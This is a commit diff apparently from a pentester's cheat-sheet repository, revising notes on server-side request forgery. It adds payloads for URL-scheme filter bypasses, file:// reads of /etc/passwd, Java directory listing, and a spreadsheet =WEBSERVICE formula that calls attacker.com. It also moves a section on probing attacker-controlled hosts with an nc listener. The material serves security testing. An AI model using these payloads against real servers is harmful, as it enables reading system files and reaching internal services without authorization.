Add new cases

0xn3va · Mar 27, 2022 · bc6e85c · bc6e85c
1 parent 65929f1
commit bc6e85c
Show file tree

Hide file tree

Showing 2 changed files with 72 additions and 22 deletions.
diff --git a/Web Application/Server Side Request Forgery/README.md b/Web Application/Server Side Request Forgery/README.md
@@ -39,8 +39,9 @@ These bypass approaches work because the application only validates the provided
 
 ## URL scheme
 
-You can try using different URL schemes to bypass the filter:
-```http
+You can try to use different URL schemes:
+
+```bash
 file://path/to/file
 dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
 dict://127.0.0.1:1337/stats
@@ -53,6 +54,31 @@ ldapi://127.0.0.1:389/%0astats%0aquit
 gopher://attacker-website.com/_SSRF%0ATest!
 ```
 
+### Node.js
+
+Node.js for Windows considers any single letter in a URL scheme as `drive://filepath` and set the protocol to `file://`.
+
+```javascript
+// Node.js (Windows only)
+// the following row will return `file:`
+new URL('l://file').protocol
+```
+
+References:
+- [@PwnFunction tweet](https://twitter.com/PwnFunction/status/1484510976183443464)
+
+### Java
+
+Java's URL will correctly handle the next URLs:
+
+```bash
+url:file:///etc/passwd
+url:http://127.0.0.1:8080
+```
+
+References:
+- `@phithon_xg` tweets [1](https://twitter.com/phithon_xg/status/1499414715033735169) and [2](https://twitter.com/phithon_xg/status/1498153253350961152)
+
 ## IP address formats
 
 You can try using a different IP address format to bypass the filter.
@@ -271,6 +297,17 @@ References:
 - [Report: Blind SSRF/XSPA on dashboard.lob.com + blind code injection](https://hackerone.com/reports/517461)
 - [Report: Bypassing HTML filter in "Packing Slip Template" Lead to SSRF to Internal Kubernetes Endpoints](https://hackerone.com/reports/1115139)
 
+# Spreadsheet exporting
+
+If an application is running on a Windows server and exporting to a spreadsheet try to use [WEBSERVICE](https://support.microsoft.com/en-us/office/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4) function to gain a SSRF:
+
+```
+=WEBSERVICE('https://attacker.com')
+```
+
+References:
+- [@intigriti tweet](https://twitter.com/intigriti/status/1500088756132589570)
+
 # Request splitting
 
 {% embed url="https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/" %}

diff --git a/Web Application/Server Side Request Forgery/post-exploitation.md b/Web Application/Server Side Request Forgery/post-exploitation.md
@@ -10,26 +10,6 @@ file:///etc/passwd
 file://\/\/etc/passwd
 ```
 
-## Retrieving protocol versions
-
-You can enumerate versions of the different protocols by sending a request to your server.
-
-```http
-ftp://attacker-website.com
-sftp://attacker-website.com:1337
-dict://attacker-website.com:1337
-```
-
-```bash
-$ nc -v -l 1337
-Connection from [12.234.12.234] port 1337 [tcp/*] accepted (family 2, sport 31337)
-SSH-2.0-libssh2_0.1.2
-```
-
-## Leaking internal domains
-
-When connected to SMTP, internal domains might leak from the first line. To do this, connect to `http://127.0.0.1:25` or some internal IP address `http://10.0.0.6:25` with SMTP available and from the first line get the internal domain name: `220 subdomain.internal-host.com ESMTP Sendmail`
-
 ## Crafting TCP packets
 
 You can use the `ldap`, `git`, or `dict` URL schemes to create cleartext connections to TCP-based services.
@@ -64,6 +44,23 @@ TESTUDPPACKEToctettsize0blksize512timeout6
 
 This can be used to craft request to various UDP-services, like Memcached.
 
+## Java directory listing
+
+Java lists directories via a `file://` scheme, the following code will print a directory listing:
+
+```java
+URL url = new URL("file:///etc/");
+String data = new String(IOUtils.toByteArray(url));
+System.out.println(data);
+```
+
+References:
+- [@phithon_xg tweet](https://twitter.com/phithon_xg/status/1499414715033735169)
+
+## Leaking internal domains
+
+When connected to SMTP, internal domains might leak from the first line. To do this, connect to `http://127.0.0.1:25` or some internal IP address `http://10.0.0.6:25` with SMTP available and from the first line get the internal domain name: `220 subdomain.internal-host.com ESMTP Sendmail`
+
 ## TLS fields injection
 
 TLS allows you to smuggle arbitrary data inside fields such as Server Name Indication or Session ID. You can use this to deliver payload to http/text-based services.
@@ -72,6 +69,22 @@ References:
 - [SNI injection: A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!](https://github.com/0xn3va/cheat-sheets/blob/master/Web%20Application/Server%20Side%20Request%20Forgery/materials/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)
 - [DEF CON Safe Mode - Joshua Maddux - When TLS Hacks You](https://www.youtube.com/watch?v=qGpAJxfADjo) + [TLS Poison](https://github.com/jmdx/TLS-poison)
 
+## Retrieving protocol versions
+
+You can enumerate versions of the different protocols by sending a request to your server.
+
+```http
+ftp://attacker-website.com
+sftp://attacker-website.com:1337
+dict://attacker-website.com:1337
+```
+
+```bash
+$ nc -v -l 1337
+Connection from [12.234.12.234] port 1337 [tcp/*] accepted (family 2, sport 31337)
+SSH-2.0-libssh2_0.1.2
+```
+
 ## Abusing Gopher
 
 Gopher is a communications protocol designed for distributing, searching, and retrieving documents. Gopher provides a wide range of abuse options, see [more](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#gopher).